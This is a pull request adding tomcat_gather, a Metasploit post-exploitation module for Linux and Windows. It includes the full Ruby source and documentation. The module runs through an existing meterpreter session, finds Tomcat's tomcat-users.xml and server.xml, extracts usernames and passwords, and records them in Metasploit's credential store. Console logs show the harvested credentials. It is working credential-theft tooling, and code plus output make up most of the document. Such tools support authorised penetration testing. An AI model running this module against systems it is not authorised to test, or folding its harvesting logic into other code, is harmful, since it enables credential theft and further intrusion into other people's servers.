### PR TITLE
Added tomcat_gather modules to Metasploit.

### DIFF
--- a/modules/post/multi/gather/tomcat_gather.md
+++ b/modules/post/multi/gather/tomcat_gather.md
@@ -1,0 +1,97 @@
+## Creating A Testing Environment
+  For this module to work you need a linux or windows machine.
+  For linux you can run something like apt-get install tomcat7 to get a working tomcat service.
+  For WIndows you can download tomcat from http://tomcat.apache.org/ and then install it as a service.
+
+This module has been tested against:
+
+  1. Xubuntu 16.04 with tomcat 7,8.
+  2. Windows 10 with tomcat 6,7.
+
+This module was not tested against, but may work against:
+
+  1. Other versions of linux running tomcat v4-9
+  2. Other version of windows running tomcat v4-9
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obatin a meterpreter session via whatever method
+  3. Do: 'use post/multi/gather/tomcat_gather'
+  4. Do: 'set session #'
+  5. Do: 'run'
+
+## Scenarios
+
+### Xubuntu 16.04 with tomcat 7 and 8
+
+#### Running without read permissions
+
+    msf post(tomcat_gather) > set session 1
+    session => 1
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:19:27] Unix OS detected
+    [*] [2017.03.31-10:19:28] /etc/tomcat7/tomcat-users.xml found
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat7/tomcat-users.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat7/tomcat-users.xml you probably don't have permission to open the file or parsing failed.
+    [*] [2017.03.31-10:19:28] /etc/tomcat8/tomcat-users.xml found
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat8/tomcat-users.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat8/tomcat-users.xml you probably don't have permission to open the file or parsing failed.
+    [*] [2017.03.31-10:19:28] Attempting to extract Tomcat listening ports from /etc/tomcat7/server.xml
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat7/server.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat7/server.xml you probably don't have permission to open the file or parsing failed
+    [*] [2017.03.31-10:19:28] Attempting to extract Tomcat listening ports from /etc/tomcat8/server.xml
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat8/server.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat8/server.xml you probably don't have permission to open the file or parsing failed
+    [*] [2017.03.31-10:19:28] No user credentials have been found
+    [*] Post module execution completed
+
+#### Running with read permissions
+
+    msf post(tomcat_gather) > set session 2
+    session => 2
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:33:14] Unix OS detected
+    [*] [2017.03.31-10:33:15] /etc/tomcat7/tomcat-users.xml found
+    [*] [2017.03.31-10:33:15] /etc/tomcat8/tomcat-users.xml found
+    [*] [2017.03.31-10:33:15] Attempting to extract Tomcat listening ports from /etc/tomcat7/server.xml
+    [*] [2017.03.31-10:33:15] Attempting to extract Tomcat listening ports from /etc/tomcat8/server.xml
+    [+] [2017.03.31-10:33:16] Username and password found in /etc/tomcat7/tomcat-users.xml - tomcat2:s3cret
+    [+] [2017.03.31-10:33:16] Username and password found in /etc/tomcat8/tomcat-users.xml - tomcat2:s3cret
+    [*] Post module execution completed
+        
+    msf post(tomcat_gather) > creds
+    Credentials
+    ===========
+
+    host        origin      service            public   private  realm  private_type
+    ----        ------      -------            ------   -------  -----  ------------
+    10.10.10.6  10.10.10.6  8080/tcp (Tomcat)  tomcat2  s3cret          Password
+
+
+### Windows 10 with tomcat 7
+
+#### Running with read permissions
+
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:43:18] Windows OS detected, enumerating services
+    [+] [2017.03.31-10:43:18] Tomcat service found
+    [*] [2017.03.31-10:43:18] C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml found!
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - tomcat:tomcat
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - both:<must-be-changed>
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - role1:<must-be-changed>
+    [*] Post module execution completed
+
+    msf post(tomcat_gather) > creds
+    Credentials
+    ===========
+
+    host        origin      service            public   private            realm  private_type
+    ----        ------      -------            ------   -------            -----  ------------
+    10.10.10.6  10.10.10.6  8080/tcp (Tomcat)  tomcat2  s3cret                    Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  tomcat   tomcat                    Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  both     <must-be-changed>         Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  role1    <must-be-changed>         Password

--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@@ -67,7 +67,7 @@ $port = Array.new
         tomcatHomeArray.push(service_info(service[:name])[:path].split("\\bin\\")[0])
       end
     end
-      
+
     if tomcatHomeArray.size > 0
       tomcatHomeArray.each do |tomcat_home|
         if tomcat_home.include? '"'
@@ -120,7 +120,7 @@ $port = Array.new
   def gathernix()
     print_status("Unix OS detected")
     user_files = cmd_exec('locate tomcat-users.xml').split("\n")
-    if user_files.size > 0 
+    if user_files.size > 0
       user_files.each do |path|
         if exist?(path)
             print_status(path + " found")
@@ -149,7 +149,7 @@ $port = Array.new
     end
 
     port_path = cmd_exec('locate server.xml').split("\n")
-    if port_path.size > 0 
+    if port_path.size > 0
       port_path.each do |path|
         if exist?(path) and path.include? "tomcat"
           xml = read_file(path).split("\n")
@@ -181,7 +181,6 @@ $port = Array.new
       gathernix()
     end
 
-  
   if $username.size == 0
     print_status("No user credentials have been found")
   end

--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@@ -1,0 +1,166 @@
+require 'rex'
+require 'rexml/document'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Services
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Gather Tomcat Credentials',
+      'Description'   => %q{
+        This module will attempt to collect credentials from Tomcat services running on the machine.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+        'Koen Riepe <koen.riepe@fox-it.com>', # Module author
+      ],
+      'Platform'      => [ 'win', 'linux' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+  end
+
+$username = Array.new
+$password = Array.new
+$port = 0
+
+  def report_creds(user, pass, port)
+    return if (user.empty? or pass.empty?)
+      # Assemble data about the credential objects we will be creating
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        private_data: pass,
+        private_type: :password,
+        session_id: session_db_id,
+        username: user,
+        workspace_id: myworkspace_id,
+      }
+
+      credential_core = create_credential(credential_data)
+
+      if not port.is_a? Integer
+        print_status("Port not an Integer")
+        port = 8080
+      end
+
+      login_data = {
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+            port: port,
+            service_name: 'Tomcat',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        create_credential_login(login_data)
+  end
+
+  def gatherwin()
+    print_status("Windows OS detected, enumerating services")
+    service_list.each do |service|
+      if service[:name].downcase().include? "tomcat"
+        print_good("Tomcat service found")
+        tomcat_home = service_info(service[:name])[:path].split("\\bin\\")[0]
+        conf_path = tomcat_home.split('"')[1] + "\\conf\\tomcat-users.xml"
+
+        if exist?(conf_path)
+          print_status("tomcat-users.xml found")
+          xml = read_file(conf_path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+
+        port_path = tomcat_home.split('"')[1] + "\\conf\\server.xml"
+        if exist?(port_path)
+          xml = read_file(port_path).split("\n")
+        end
+        comment_block = false
+        xml.each do |line|
+          if line.include? "<Connector" and not comment_block
+            $port = line.split('<Connector port="')[1].split('"')[0].to_i
+          elsif line.include? ("<!--")
+            comment_block = true
+          elsif line.include? ("-->") and comment_block
+            comment_block = false
+          end
+        end
+      end
+    end
+  end
+
+  def gathernix()
+    print_status("Unix OS detected")
+    user_files = cmd_exec('locate tomcat-users.xml').split("\n")
+    user_files.each do |path|
+      if exist?(path) and not path.include? "tomcat8"
+          print_status("tomcat-users.xml found")
+          xml = read_file(path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+    end
+
+    port_path = cmd_exec('locate server.xml').split("\n")
+    port_path.each do |path|
+      if exist?(path)
+          xml = read_file(path).split("\n")
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<Connector" and not comment_block
+              $port = line.split('<Connector port="')[1].split('"')[0].to_i
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+      end
+    end
+  end
+
+  def run()
+    if sysinfo['OS'].include? "Windows"
+      gatherwin()
+    else
+      gathernix()
+    end
+
+  i=0
+  while i < $username.count
+    print_good("Username and password found: " + $username[i] + ":" + $password[i])
+    report_creds($username[i],$password[i],$port)
+    i+=1
+  end
+
+  $username = Array.new
+  $password = Array.new
+  $port = 0
+
+  end
+
+end


### PR DESCRIPTION
tomcat_gather can be used to extract username and password combinations from linux and windows systems running tomcat. 

## Verification

List the steps needed to make sure this thing works

- [x] Have an existing meterpreter session
- [x] `use post/multi/gather/tomcat_gather`
- [x] `set session X`
- [x] `run`
```
Unix OS detected
tomcat-users.xml found
Username & password found: tomcat:tomcat
Username & password found: both:tomcat
Username & password found: role1:tomcat
Username & password found: tomcat1:tomcat1
Username & password found: tomcat2:s3cret
Post module execution completed
```
